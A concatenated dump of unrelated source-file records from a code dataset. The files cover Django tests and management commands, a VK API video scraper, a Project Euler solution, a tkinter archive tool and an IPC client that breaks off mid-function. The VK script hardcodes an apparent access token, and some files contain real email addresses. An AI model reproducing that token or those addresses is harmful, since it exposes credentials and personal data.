main(**args)\r\n logger.info(\"Completed in %.2f minutes\", (time.time() - start_time) / 60)\r\n\r\n# Run MAIN\r\nif __name__ == \"__main__\":\r\n _cli()\r\n","sub_path":"odcm.py","file_name":"odcm.py","file_ext":"py","file_size_in_byte":46975,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"492357190","text":"from django.test import TestCase\nfrom models import Usage\nfrom models import MachineGroups\nfrom models import MachineCategory\nfrom django.forms.models import model_to_dict\n# from util import email_alert\nfrom util import testExecTime\n# Create your tests here.\nimport logging\nlogger = logging.getLogger(__name__)\nclass UsageTestCase(TestCase):\n fixtures = ['machine_status']\n\n # def testSentEmail(self):\n # email_alert('xud@sybase.com','test Sent text','This is a test email, test sent to ability.')\n # email_alert('xud@sybase.com','test Sent html','test
<h1>Test</h1>
This is a test email, test sent to ability.')\n    #     email_alert('xud@sybase.com','test CC','This is a test email, test CC ability.',cc=['xud@sybase.com'])\n    #     email_alert('xud@sybase.com','test BCC','This is a test email, test BCC ability.',bcc=['xud@sybase.com'])\n    #     logger.info(\"Please check your mailbox, 3 mails should be received.\")\n    #     return True\n\n    def testImportModes(self):\n        self.assertGreater(MachineCategory.objects.all().count(), 0, 'MachineCategory data not loaded.')\n        self.assertGreater(MachineGroups.objects.all().count(), 0, 'MachineGroups data not loaded.')\n        self.assertGreater(Usage.objects.all().count(), 0, 'Usage data not loaded.')\n\n    def testGetUsagePerf(self):\n        def toDict(machine):\n            # obj_dict = Machine.objects.filter(id=self.id).values()[0]\n            obj_dict = model_to_dict(machine)\n            try:\n                obj_dict['perf_rating'] = machine.perf_rating(machine.groups.all()[0])\n                obj_dict['machine_status'] = machine.getMachineStatus(machine.groups.all()[0]).__dict__\n            except Exception:\n                obj_dict['perf_rating'] = 'NA'\n                obj_dict['machine_status'] = 'NA'\n\n            # do not call toDict() method for item object again\n            # obj_dict['mon_items'] = map(model_to_dict, iter(self.item_set.all()))\n            obj_dict['mon_items'] = machine.dumpItems()\n            obj_dict['quasr_space'] = machine.quasrspaceSize\n            obj_dict['reserved'] = machine.reserved\n            obj_dict['reserve_type'] = machine.reserve_type\n            obj_dict['lastUpdate'] = machine.lastUpdate\n            return obj_dict\n\n        def toDictNoStatus(machine):\n            # obj_dict = Machine.objects.filter(id=self.id).values()[0]\n            obj_dict = model_to_dict(machine)\n\n            # do not call toDict() method for item object again\n            # obj_dict['mon_items'] = map(model_to_dict, iter(self.item_set.all()))\n            obj_dict['mon_items'] = machine.dumpItems()\n            # obj_dict['quasr_space'] = machine.quasrspaceSize\n            # obj_dict['reserved'] = machine.reserved\n            obj_dict['reserve_type'] = machine.reserve_type\n            obj_dict['lastUpdate'] = machine.lastUpdate\n            return obj_dict\n\n        usage = Usage.objects.get(id=1)\n        machines = usage.machine_set.all()\n        for m in machines:\n            testExecTime(toDict, m)\n        for m in machines:\n            testExecTime(toDictNoStatus, m)\n\n        testExecTime(lambda: map(lambda m: toDict(m), iter(machines)))\n        testExecTime(lambda: map(lambda m: toDictNoStatus(m), iter(machines)))\n\n    def testShowUsage(self):\n        response = self.client.get('/ui5/showusage/1/')\n        self.assertEqual(response.status_code, 200, 'Did not get correct status code, got %s' % response.status_code)","sub_path":"machine_status/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":3420,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"593303293","text":"from django.core.management.base import BaseCommand, CommandError\nfrom ppm.models import SafetyTrainingRecord, SubscribedService, MiscCredentialRecord, EmailNotification\nfrom django.core.mail import EmailMessage\nfrom django.db.models import Q\nimport datetime\n\n\nclass Command(BaseCommand):\n    help = 'Expired training notifier'\n\n    def handle(self, *args, **options):\n        emails = self.get_ppm_emails()\n        training = self.get_training()\n        credentials = self.get_credentials()\n\n        #self.send_notifications('ofp.101@gmail.com', list, 'Teal Construction')\n        self.check_dates(emails, training, 'training')\n        self.check_dates(emails, credentials, 'credential')\n\n    def check_dates(self, emails, training, training_type):\n        # Get today's date\n        today = datetime.date.today()\n\n        # Iterate through each email and send the list of expired records\n        for e in emails:\n            notification_list = []\n\n            for t in training:\n                if not 
self.get_subscribed_service(t.group_id):\n continue\n if t.expiration_date is None:\n continue\n\n # Check whether training is safety training or misc credentials\n course = self.check_training_type(t, training_type)\n\n # Make sure the email belongs to the group.\n if t.group_id == e.group_id:\n company = t.group.name\n employee = t.profile.first_name + ' ' + t.profile.last_name\n formated_date = t.expiration_date.strftime('%b %d, %Y')\n\n # Check to see if t.expiration_date is (N) days before, past or today\n if today + datetime.timedelta(days=90) == t.expiration_date:\n notice = \"%s's %s will expire in 90 days on %s\" % (employee, course, formated_date)\n notification_list.append(notice)\n elif today + datetime.timedelta(days=60) == t.expiration_date:\n notice = \"%s's %s will expire in 60 days on %s\" % (employee, course, formated_date)\n notification_list.append(notice)\n elif today + datetime.timedelta(days=30) == t.expiration_date:\n notice = \"%s's %s will expire in 30 days on %s\" % (employee, course, formated_date)\n notification_list.append(notice)\n elif t.expiration_date == today:\n notice = \"%s's %s expires today\" % (employee, course)\n notification_list.append(notice)\n elif today + datetime.timedelta(days=-30) == t.expiration_date:\n notice = \"%s's %s expired 30 days ago on %s. FINAL NOTICE. \" % (employee, course, formated_date)\n notification_list.append(notice)\n\n if notification_list:\n self.send_notifications(e.email, notification_list, company)\n\n def check_training_type(self, t_obj, training_type):\n if training_type == 'training':\n return t_obj.course.name\n elif training_type == 'credential':\n return t_obj.credential.name\n\n def get_training(self):\n training = SafetyTrainingRecord.objects.filter(profile__is_active=1).order_by('profile__first_name')\n return training\n\n def get_credentials(self):\n credentials = MiscCredentialRecord.objects.filter(profile__is_active=1).order_by('profile__first_name')\n return credentials\n\n def get_ppm_emails(self):\n emails = EmailNotification.objects.filter(app__in=['All', 'PPM'])\n return emails\n\n def get_subscribed_service(self, group_id):\n service = SubscribedService.objects.get(group_id=group_id)\n return service.ppm\n\n def send_notifications(self, email, notification_list, company):\n print(notification_list)\n msg = EmailMessage('Expired Training Records', self.message(notification_list, company),\n 'do-not-reply@csc-safety.com',\n to=[email, 'notifications@intelligent-d2.com'])\n msg.content_subtype = 'html'\n msg.send()\n\n def message(self, notification_list, company):\n date = datetime.date.today().strftime('%b %d, %Y')\n message = \"\"\"\\\n \n \n \n Compliance Safety Consulting\n \n \n \n \n \n \n \n\n \"\"\"\n for row in notification_list:\n message += ''\n message += \"\"\"\\\n
<tr>\n <td>\"\"\" + company + \"\"\": Expiration list generated on \"\"\" + str(date) + \"\"\"</td>\n </tr>\n <tr>\n <td>\"\"\" + row + \"\"\"</td>\n </tr>
\n \n \n \"\"\"\n return message\n","sub_path":"ppm/management/commands/expired_training_notifier.py","file_name":"expired_training_notifier.py","file_ext":"py","file_size_in_byte":5363,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"476995066","text":"# -*- coding: utf-8 -*-\nimport requests\nimport os, time\naccess_token = \"261beb8cbe14581fd4c8edf0805d505a05d439816bc27beedd9051b75ce84e768a100d149727811aeb5a8\"\ndef get_a():\n vk_id = \"67267231\" # skynet\n #vk_id = \"47376425\" #цифровая копия\n URL = f\"https://api.vk.com/method/video.getAlbums?owner_id=-{vk_id}&access_token={access_token}&v=5.92\"\n r = requests.get(url = URL) \n data = r.json() \n FLINK = open(\"video_link.txt\",\"w\")\n for G in data['response']['items']:\n URL_get = f\"https://api.vk.com/method/video.get?owner_id=-{vk_id}&album_id={G['id']}&access_token={access_token}&v=5.92\"\n r = requests.get(url = URL_get).json() \n time.sleep(0.5)\n try:\n for o in r['response']['items']:\n print (o['player']) #[0]['url'] \n FLINK.write(f\"{o['player']};{G['title']}\\n\")\n except KeyError:\n print (r)\n \n FLINK.close() \nget_a()\n","sub_path":"vk parsing/get_data_skynet_v.py","file_name":"get_data_skynet_v.py","file_ext":"py","file_size_in_byte":957,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"477762881","text":"\"\"\"\nMichael S. Emanuel\nFri Oct 21 15:48:47 2016\n\nNumber letter counts\nProblem 17\n\nIf the numbers 1 to 5 are written out in words: one, two, three, four, five,\nthen there are 3 + 3 + 5 + 4 + 4 = 19 letters used in total.\n\nIf all the numbers from 1 to 1000 (one thousand) inclusive were written out in words,\nhow many letters would be used?\n\nNOTE: Do not count spaces or hyphens.\nFor example, 342 (three hundred and forty-two) contains 23 letters and\n115 (one hundred and fifteen) contains 20 letters.\nThe use of \"and\" when writing out numbers is in compliance with British usage.\n\"\"\"\n\nfrom Euler.Utility import range_inc\nfrom typing import Dict\n\n\ndef numLen(n: int, nw: Dict[int, str]) -> int:\n w = nw[n]\n w = w.replace(' ', '')\n w = w.replace('-', '')\n return len(w)\n\n\ndef makeNumWord() -> Dict[int, str]:\n \"\"\"Build a dictionary numword.\"\"\"\n # Dictionary numword\n # key = integer n, value = string of word\n nw: Dict[int, str] = {}\n # 1-10\n nw[1] = 'one'\n nw[2] = 'two'\n nw[3] = 'three'\n nw[4] = 'four'\n nw[5] = 'five'\n nw[6] = 'six'\n nw[7] = 'seven'\n nw[8] = 'eight'\n nw[9] = 'nine'\n nw[10] = 'ten'\n # 11-19\n nw[11] = 'eleven'\n nw[12] = 'twelve'\n nw[13] = 'thirteen'\n nw[14] = 'fourteen'\n nw[15] = 'fifteen'\n nw[16] = 'sixteen'\n nw[17] = 'seventeen'\n nw[18] = 'eighteen'\n nw[19] = 'nineteen'\n # Multiples of 10 from 20 to 100\n nw[20] = 'twenty'\n nw[30] = 'thirty'\n nw[40] = 'forty'\n nw[50] = 'fifty'\n nw[60] = 'sixty'\n nw[70] = 'seventy'\n nw[80] = 'eighty'\n nw[90] = 'ninety'\n # Finally need 1000\n nw[1000] = 'one thousand'\n\n # Fill in other numbers between 21 and 100\n n1: int\n n2: int\n n3: int\n for n2 in range(20, 100, 10):\n # n2 is the tens place\n # w2 is the word form\n w2: str = nw[n2]\n for n1 in range(1, 10):\n # n1 is the ones place\n # n is the sum of the multiple of 10 and the ones place\n n: int = n2 + n1\n # The word form of n2\n w1: str = nw[n1]\n # The word is just TensWord-OnesWord\n nw[n] = w2 + '-' + w1\n\n # Fill in other numbers between 100 and 1000\n # n3 is the multiple of 100\n for n3 in range(100, 1000, 100):\n # d3 = 
n3 // 100\n w3 = nw[n3 // 100] + ' hundred'\n nw[n3] = w3\n for n21 in range(1, 100):\n n = n3 + n21\n # w = w3 + ' and ' + nw[n21]\n nw[n] = w3 + ' and ' + nw[n21]\n # Sanity check: nw should have exactly 1000 entries\n assert len(nw) == 1000\n return nw\n\n\ndef main() -> int:\n # Generate the numword table\n nw = makeNumWord()\n # Add up string lengths\n stringLen = sum(numLen(n, nw) for n in range_inc(1000))\n # Print answer\n print(f'The count of letters in the numbers from 1 to 1000 is {stringLen}.')\n return stringLen\n\n\nif __name__ == \"__main__\":\n # execute only if run as a script\n main()\n","sub_path":"Prob017_NumberLetterCount.py","file_name":"Prob017_NumberLetterCount.py","file_ext":"py","file_size_in_byte":2966,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"518426221","text":"#!/usr/bin/python\n#coding:utf-8\n'''执行测试用例,记录测试结果和输出测试报告'''\n\nfrom log import logger\nfrom pathlib import Path\nfrom utils import Excel,to_json\nfrom data import replace\nimport httpcaps\n\nclass Testcase:\n def __init__(self,testcase,junit):\n self.junit = junit\n self.testcase = testcase\n self.file_element = str(Path('elements')/('elements.xlsx'))\n self.excel_element = Excel.readExcel(self.file_element)\n self.element_data = self.excel_element.red()\n self.elements = to_json(self.element_data[1:])\n self.step_fail = 0\n self.step_error = 0\n self.errors_detail = ''\n def run(self):\n steps=[]\n for index, step in enumrate(self.testcase['step']):\n try:\n url = self.elements['baseurl']['url'] + self.elements[step['element']]['url']\n sort = self.elements[step['element']]['type']\n step['element'] = url.strip()\n if step['data']:\n step['data'] = replace(str(step['data']))\n result_json = getattr(httpcaps, 'http_requests')(step, self.junit,sort)\n if result_json['score'] != 'Pass':\n self.step_fail += 1\n steps.append(result_json)\n except Exception as e:\n step['score'] = 'Fail'\n step['_resultinfo'] = 'exception: %s' % e\n self.step_error += 1\n logger.info(step)\n self.junit.failure(\n 'testdot:' + step['testdot'] + '-' + 'step:' + step['no'] + '-' + 'element:' + step['element'] + '-' + 'error:%s' % e\n )\n self.error_detail += step['testdot'] + '--' + '{}'.format(e)\n steps.append(step)\n logger.error('error:interface and element not found%s' % e)\n logger.error('error:%s' % e)\n self.junit.suite(self.step_error,self.step_fail,len(self.testcase),'')\n self.junit.settime()\n #记录生成的测试结果,生成测试报告excel版本\n self.testcase['step'] = steps\n return self.testcase","sub_path":"mytestcase/control/testcase.py","file_name":"testcase.py","file_ext":"py","file_size_in_byte":2166,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"12946708","text":"import json\nimport os.path\n\nbig_malt_list = []\nbig_hop_list = []\nbig_yeast_list = []\n\ndef dump_to_json(type, list):\n data_path = os.path.dirname(__file__)\n json_object = json.dumps(list, indent = 4)\n with open(data_path+\"/\"+type+\"_datas.json\", \"w\") as outfile:\n outfile.write(json_object)\n\nif __name__ == \"__main__\":\n import sys\n sys.path.append(os.path.dirname(__file__)+\"/shops\")\n from shops import *\n arr = os.listdir(os.path.dirname(__file__)+\"/shops\")\n for file in arr:\n if file != \"__init__.py\" and file != \"__pycache__\" and file !=\"template.py\" and \".py\" in file and \"olasz\" not in file:\n run = file.replace(\".py\",\"\")+\".crawl_malts()\"\n locals = {}\n list = exec(\"list = \"+run, None, locals)\n 
big_malt_list.extend(locals[\"list\"])\n\n run = file.replace(\".py\",\"\")+\".crawl_hops()\"\n locals = {}\n list = exec(\"list = \"+run, None, locals)\n big_hop_list.extend(locals[\"list\"])\n\n run = file.replace(\".py\",\"\")+\".crawl_yeasts()\"\n locals = {}\n list = exec(\"list = \"+run, None, locals)\n big_yeast_list.extend(locals[\"list\"])\n\n dump_to_json(\"malt\", big_malt_list)\n dump_to_json(\"hop\", big_hop_list)\n dump_to_json(\"yeast\", big_yeast_list)","sub_path":"crawler.py","file_name":"crawler.py","file_ext":"py","file_size_in_byte":1307,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"532588235","text":"from os import listdir\nfrom os.path import isfile, join\nimport numpy as np \nfolder = '/share/DEEPLEARNING/datasets/voc2012/VOCdevkit/VOC2012'\nimages = 'JPEGImages'\nmask = 'SegmentationClassAug'\npath = 'voc_splits/clean_train.txt'\n\nexamples = 2126\n\nwith open(path) as f:\n onlyfiles = f.readlines()\n# you may also want to remove whitespace characters like `\\n` at the end of each line\nonlyfiles = np.array([x.strip() for x in onlyfiles] )\nnp.random.shuffle(onlyfiles)\n\nsupervised = onlyfiles[:examples]\nunsupervised = onlyfiles[examples+2:examples*2+2]\n\nprint(len(supervised))\nprint(len(unsupervised))\n\n\nf_supervised = str(examples)+'_train_supervised.txt'\nf_unsupervised = str(examples)+'_train_unsupervised.txt'\n\n# Supervised\ntextfile = open(join('voc_splits',f_supervised), \"w\")\n\nfor element in supervised:\n textfile.write('/'+join(images,element+'.jpg')+' '+'/'+join(mask,element+'.png') + \"\\n\")\n\ntextfile.close()\n\n# Unsupervised \ntextfile = open(join('voc_splits',f_unsupervised), \"w\")\n\nfor element in unsupervised:\n textfile.write('/'+join(images,element+'.jpg')+' '+'/'+join(mask,element+'.png') + \"\\n\")\n\ntextfile.close()\n\n\n","sub_path":"dataloaders/split.py","file_name":"split.py","file_ext":"py","file_size_in_byte":1138,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"270858274","text":"#!/usr/bin/env python3\n\n\"\"\"Main tkinter GUI file used by Windows OS.\"\"\"\n\nimport exceptions\nimport logging\nimport os\nimport os.path\nimport saf\nimport tkinter as tk\nfrom tkinter import filedialog\nfrom tkinter import ttk\n\n\nclass GuiTk():\n \"\"\"Class for main tkinter GUI.\"\"\"\n\n def __init__(self, root, gs):\n \"\"\"Class variables for GuiTk class.\"\"\"\n self.root = root\n self.root.title('PySAF')\n\n self.main_frame = ttk.Frame(self.root)\n self.main_frame.pack(expand=True, fill='both')\n\n self.dir_frame = ttk.Frame(self.main_frame)\n self.dir_frame.grid(row=1)\n\n self.zip_frame = ttk.Frame(self.main_frame)\n self.zip_frame.grid(row=2)\n\n self.license_frame = ttk.Frame(self.main_frame)\n self.license_frame.grid(row=3)\n\n self.access_frame = ttk.Frame(self.main_frame)\n self.access_frame.grid(row=4)\n\n self.create_frame = ttk.Frame(self.main_frame)\n self.create_frame.grid(row=5)\n\n self.progress_frame = ttk.Frame(self.main_frame)\n self.progress_frame.grid(row=6)\n\n self.csv_file_button = ttk.Button(self.dir_frame,\n width=25,\n text='Select CSV File',\n command=lambda: self.csv_file_open(gs))\n self.csv_file_button.grid(column=0, row=1, sticky='e')\n self.csv_file_var = tk.StringVar()\n self.csv_file_entry = ttk.Entry(self.dir_frame,\n width=60,\n textvariable=self.csv_file_var)\n self.csv_file_entry.grid(column=1, row=1, sticky='nsew')\n\n self.bit_dir_button = ttk.Button(self.dir_frame,\n width=25,\n 
text='Select Location of Files',\n command=lambda: self.bit_dir_open(gs))\n self.bit_dir_button.grid(column=0, row=2, sticky='e')\n self.bit_dir_var = tk.StringVar()\n self.bit_dir_entry = ttk.Entry(self.dir_frame,\n width=60,\n textvariable=self.bit_dir_var)\n self.bit_dir_entry.grid(column=1, row=2, sticky='nsew')\n\n self.archive_dir_button = ttk.Button(self.dir_frame,\n width=25,\n text='Select Archive Destination',\n command=lambda: self.archive_dir_open(gs))\n self.archive_dir_button.grid(column=0, row=3, sticky='e')\n self.archive_dir_var = tk.StringVar()\n self.archive_dir_entry = ttk.Entry(self.dir_frame,\n width=60,\n textvariable=self.archive_dir_var)\n self.archive_dir_entry.grid(column=1, row=3, sticky='nsew')\n\n self.zip_button_var = tk.IntVar()\n self.zip_button = ttk.Checkbutton(self.zip_frame,\n text='Create ZIP File',\n variable=self.zip_button_var,\n command=lambda: self.create_zip_button(gs))\n self.zip_button.grid(row=1, columnspan=3)\n\n self.license_button_var = tk.IntVar()\n self.license_button = ttk.Checkbutton(self.license_frame,\n text='Create License',\n variable=self.license_button_var,\n command=lambda: self.create_license_button(gs))\n self.license_button.grid(row=1, columnspan=2)\n\n self.access_button_var = tk.IntVar()\n self.access_button = ttk.Checkbutton(self.access_frame,\n text='Restrict Read Access',\n variable=self.access_button_var,\n command=lambda: self.restrict_access_button(gs))\n self.access_button.grid(row=1, columnspan=2)\n\n self.create_button = ttk.Button(self.create_frame,\n text='Create Archive',\n command=lambda: self.error_check(gs))\n self.create_button.grid(columnspan=2)\n\n for child in self.main_frame.winfo_children():\n child.grid_configure(padx=40, pady=15)\n\n for child in self.dir_frame.winfo_children():\n child.grid_configure(padx=5, pady=5)\n\n def csv_file_open(self, gs):\n \"\"\"Open filedialog when Select CSV File button selected.\"\"\"\n self.csv_file_path = filedialog.askopenfilename()\n gs.csv_path = self.csv_file_path\n self.csv_file_var.set(self.csv_file_path)\n\n def bit_dir_open(self, gs):\n \"\"\"Open filedialog when Select Location of Files button selected.\"\"\"\n self.bit_dir_path = filedialog.askdirectory()\n gs.bit_path = self.bit_dir_path\n self.bit_dir_var.set(self.bit_dir_path)\n\n def archive_dir_open(self, gs):\n \"\"\"Open filedialog when Select Archive Destination button selected.\"\"\"\n self.archive_dir_path = filedialog.askdirectory()\n gs.archive_path = self.archive_dir_path\n self.archive_dir_var.set(self.archive_dir_path)\n\n def create_zip_button(self, gs):\n \"\"\"Expand frame to reveal options when Create ZIP File is selected.\"\"\"\n if self.zip_button_var.get() == 1:\n self.split_button_var = tk.IntVar()\n self.split_button = ttk.Checkbutton(self.zip_frame,\n text='Split ZIP File',\n variable=self.split_button_var)\n self.split_button.grid(row=2, column=0, sticky='w')\n self.split_button.grid_configure(padx=2, pady=5)\n self.split_entry_var = tk.IntVar()\n self.split_entry = ttk.Entry(self.zip_frame,\n width=3,\n justify='right',\n textvariable=self.split_entry_var)\n self.split_entry.grid(row=2, column=1, sticky='e')\n self.split_entry.grid_configure(pady=5)\n self.split_entry_var.set('2')\n self.split_combo = ttk.Combobox(self.zip_frame,\n width=4,\n justify='left',\n values='MB GB')\n self.split_combo.current(1)\n self.split_combo.grid(row=2, column=2, sticky='w')\n self.split_combo.grid_configure(pady=5)\n else:\n self.split_button.destroy()\n self.split_entry.destroy()\n 
self.split_combo.destroy()\n\n def create_license_button(self, gs):\n \"\"\"Expanded frame to reveal options when Create License is selected.\"\"\"\n if self.license_button_var.get() == 1:\n self.license_file_label = ttk.Label(self.license_frame,\n width=20,\n anchor=tk.E,\n text='License File Name ')\n self.license_file_label.grid(row=2, column=0, sticky='e')\n self.license_file_var = tk.StringVar()\n self.license_file_entry = ttk.Entry(self.license_frame,\n width=20,\n textvariable=self.license_file_var)\n self.license_file_entry.grid(row=2, column=1, sticky='w')\n self.license_file_entry.grid_configure(pady=5)\n self.license_file_var.set('license.txt')\n\n self.license_bundle_label = ttk.Label(self.license_frame,\n width=20,\n anchor=tk.E,\n text='Bundle Name ')\n self.license_bundle_label.grid(row=3, column=0, sticky='e')\n self.license_bundle_var = tk.StringVar()\n self.license_bundle_entry = ttk.Entry(self.license_frame,\n width=20,\n textvariable=self.license_bundle_var)\n self.license_bundle_entry.grid(row=3, column=1, sticky='w')\n self.license_bundle_entry.grid_configure(pady=5)\n self.license_bundle_var.set('LICENSE')\n\n self.license_text_label = ttk.Label(self.license_frame,\n text='Enter License Text Below:')\n self.license_text_label.grid(row=4, columnspan=2)\n self.license_text_label.grid_configure(pady=5)\n self.license_var = tk.StringVar()\n self.license_text = tk.Text(self.license_frame,\n height=5,\n width=65,\n highlightthickness=1,\n highlightcolor='gray',\n highlightbackground='gray')\n self.license_text.config(wrap='word')\n self.license_text.grid(row=5, columnspan=2)\n self.license_text.grid_configure(pady=5)\n else:\n self.license_file_label.destroy()\n self.license_file_entry.destroy()\n self.license_bundle_label.destroy()\n self.license_bundle_entry.destroy()\n self.license_text_label.destroy()\n self.license_text.destroy()\n\n def restrict_access_button(self, gs):\n \"\"\"Expand frame to reveal options when Restrict Read Access is selected.\"\"\"\n if self.access_button_var.get() == 1:\n self.group_name_label = ttk.Label(self.access_frame,\n width=20,\n anchor=tk.E,\n text='Group Name ')\n self.group_name_label.grid(row=2, column=0, sticky='e')\n self.group_name_label.grid_configure(pady=5)\n self.group_name_var = tk.StringVar()\n self.group_name_entry = ttk.Entry(self.access_frame,\n width=20,\n textvariable=self.group_name_var)\n self.group_name_entry.grid(row=2, column=1, sticky='w')\n self.group_name_entry.grid_configure(pady=5)\n self.group_name_var.set('member')\n else:\n self.group_name_label.destroy()\n self.group_name_entry.destroy()\n\n def get_vars(self, gs):\n \"\"\"Get variables from tkinter widgets.\"\"\"\n gs.csv_path = self.csv_file_var.get()\n gs.bit_path = self.bit_dir_var.get()\n gs.archive_path = self.archive_dir_var.get()\n if self.zip_button_var.get():\n gs.create_zip = self.zip_button_var.get()\n gs.split_zip = self.split_button_var.get()\n gs.zip_size = self.split_entry.get()\n gs.zip_unit = self.split_combo.get()\n else:\n gs.create_zip = self.zip_button_var.get()\n if self.license_button_var.get():\n gs.create_license = self.license_button_var.get()\n gs.license_file = self.license_file_entry.get()\n gs.license_bundle = self.license_bundle_entry.get()\n gs.license_text = self.license_text.get('1.0', 'end-1c')\n else:\n gs.create_license = self.license_button_var.get()\n if self.access_button_var.get():\n gs.restrict_access = self.access_button_var.get()\n gs.group_name = self.group_name_entry.get()\n else:\n gs.restrict_access = 
self.access_button_var.get()\n\n def update_archive_button(self):\n \"\"\"Update Create Archive button to alert user to processing status.\"\"\"\n if (self.create_button.config('text')[-1] == 'Create Archive'):\n self.create_button.config(text='Processing ... Please wait.')\n self.root.update_idletasks()\n elif (self.create_button.config('text')[-1] == 'Processing ... Please wait.'):\n self.create_button.config(text='Create Archive')\n self.root.update_idletasks()\n\n def create_archive(self, gs):\n \"\"\"Handle method calls to CreateArchive class.\"\"\"\n ca = saf.CreateArchive(gs)\n if ca.split_zip:\n ca.open_csv_split()\n else:\n ca.open_csv()\n if ca.create_zip:\n ca.zip_archive()\n\n def main(self, gs):\n \"\"\"Change Create Archive button status before and after calls to CreateArchive class.\"\"\"\n self.update_archive_button()\n self.create_archive(gs)\n self.update_archive_button()\n\n def error_check(self, gs):\r\n \"\"\"Method for handling exceptions.\"\"\"\r\n ca = saf.CreateArchive(gs)\r\n self.get_vars(gs)\r\n try:\r\n if not gs.csv_path:\r\n raise IOError\r\n except IOError:\r\n exceptions.TkError.empty_csv_path_error()\r\n self.create_button.config(text='Create Archive')\r\n else:\r\n try:\r\n if not gs.bit_path:\r\n raise IOError\r\n except IOError:\r\n exceptions.TkError.empty_bit_path_error()\r\n self.create_button.config(text='Create Archive')\r\n else:\r\n try:\r\n if not gs.archive_path:\r\n raise IOError\r\n except IOError:\r\n exceptions.TkError.empty_archive_path_error()\r\n self.create_button.config(text='Create Archive')\r\n else:\r\n try:\r\n if gs.create_license:\r\n if not gs.license_text:\r\n raise IOError\r\n except IOError:\r\n exceptions.TkError.license_text_error()\r\n self.create_button.config(text='Create Archive')\r\n else:\r\n try:\r\n if not gs.csv_path.endswith('.csv'):\r\n raise TypeError\r\n except TypeError:\r\n exceptions.TkError.type_error()\r\n self.create_button.config(text='Create Archive')\r\n else:\r\n try:\r\n ca.duplicate_file_name()\r\n except IOError:\r\n self.create_button.config(text='Create Archive')\r\n except UnicodeDecodeError:\r\n exceptions.TkError.unicode_decode_error()\r\n self.create_button.config(text='Create Archive')\r\n else:\r\n try:\r\n ca.duplicate_bit_name()\r\n except IOError:\r\n self.create_button.config(text='Create Archive')\r\n else:\r\n try:\r\n ca.missing_files()\r\n except IOError:\r\n self.create_button.config(text='Create Archive')\r\n else:\r\n try:\r\n self.main(gs)\r\n except UnicodeDecodeError:\r\n exceptions.TkError.unicode_decode_error()\r\n self.create_button.config(text='Create Archive')\r\n except FileExistsError:\r\n exceptions.TkError.file_exists_error()\r\n self.create_button.config(text='Create Archive')\r\n except IndexError:\r\n exceptions.TkError.index_error()\r\n self.create_button.config(text='Create Archive')\r\n except Exception:\r\n logging.basicConfig(\r\n level=logging.DEBUG,\r\n filename=(os.path.join(\r\n gs.archive_path,\r\n 'ErrorLog.txt'))\r\n )\r\n logging.exception('Error')\r\n exceptions.TkError.unexpected_error()\r\n self.create_button.config(text='Create Archive')\r\n","sub_path":"pysaf/guiwin.py","file_name":"guiwin.py","file_ext":"py","file_size_in_byte":17197,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"72661490","text":"from django.shortcuts import redirect\nfrom .models import LegalAgreement, UserLegalAgreement\nfrom django.views import generic\nfrom django.http import JsonResponse\n\n\nclass 
LegalAgreementList(generic.ListView):\n template_name = 'legal-agreements.html'\n context_object_name = 'queryset'\n\n def get_queryset(self):\n legals = LegalAgreement.objects.filter(active=True)\n user_agree = UserLegalAgreement.objects.filter(user=self.request.user, agree=True)\n users_agree = list()\n for i in user_agree:\n users_agree.append(i.legal_agrees.id)\n queryset = {'legals': legals, 'users_agree': users_agree}\n return queryset\n\n\ndef get_legal_detail(request):\n if request.GET:\n legal = LegalAgreement.objects.get(id=request.GET.get('legal_id'))\n response = {'title': legal.title, 'text': legal.text}\n return JsonResponse(response)\n\n\ndef set_legal_agree(request):\n user = request.user\n\n list_agree = [int(item) for item in request.POST.getlist('agree')]\n\n legals = LegalAgreement.objects.filter(active=True)\n user_agree = UserLegalAgreement.objects.filter(user=user)\n\n for item in legals:\n if item.id in list_agree:\n new_agree = UserLegalAgreement(\n user=request.user,\n agree=True,\n legal_agrees=item\n )\n new_agree.save()\n\n if user_agree.count() >= legals.count():\n user.profile.all_legal_agree = True\n else:\n user.profile.all_legal_agree = False\n user.profile.save(update_fields=['all_legal_agree'])\n\n return redirect('dashboard')\n","sub_path":"legal_agreements/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1622,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"403389158","text":"#! /usr/bin/env python3\n#\n# SPDX-License-Identifier: BSD-3-Clause\n# Copyright (c) 2021 ETH Zurich\n# \n# This script is an adoption of dpdk/usertools/dpdk-telemetry.py:\n# SPDX-License-Identifier: BSD-3-Clause\n# Copyright(c) 2020 Intel Corporation\n\n\"\"\"\nScript to be used with LightningFilter IPC.\nAllows the user input commands and read the response.\n\"\"\"\n\nimport socket\nimport os\nimport sys\nimport glob\nimport json\nimport errno\nimport readline\nimport argparse\n\n# global vars\nSOCKET_NAME = 'lf-ipc'\nDEFAULT_PREFIX = 'rte'\nCMDS = []\nCMDS_SEPERATOR = \"\\t\"\n\ndef read_socket(sock, buf_len, echo=True):\n \"\"\" Read data from socket and return it in as string \"\"\"\n reply = sock.recv(buf_len).decode()\n if echo:\n print(reply)\n return reply\n\n\ndef read_socket_json(sock, buf_len, echo=True):\n \"\"\" Read data from socket and return it in JSON format \"\"\"\n reply = sock.recv(buf_len).decode()\n try:\n ret = json.loads(reply)\n except json.JSONDecodeError:\n print(\"Error in reply: \", reply)\n sock.close()\n raise\n if echo:\n print(json.dumps(ret))\n return ret\n\n\ndef get_app_name(pid):\n \"\"\" return the app name for a given PID, for printing \"\"\"\n proc_cmdline = os.path.join('/proc', str(pid), 'cmdline')\n try:\n with open(proc_cmdline) as f:\n argv0 = f.read(1024).split('\\0')[0]\n return os.path.basename(argv0)\n except IOError as e:\n # ignore 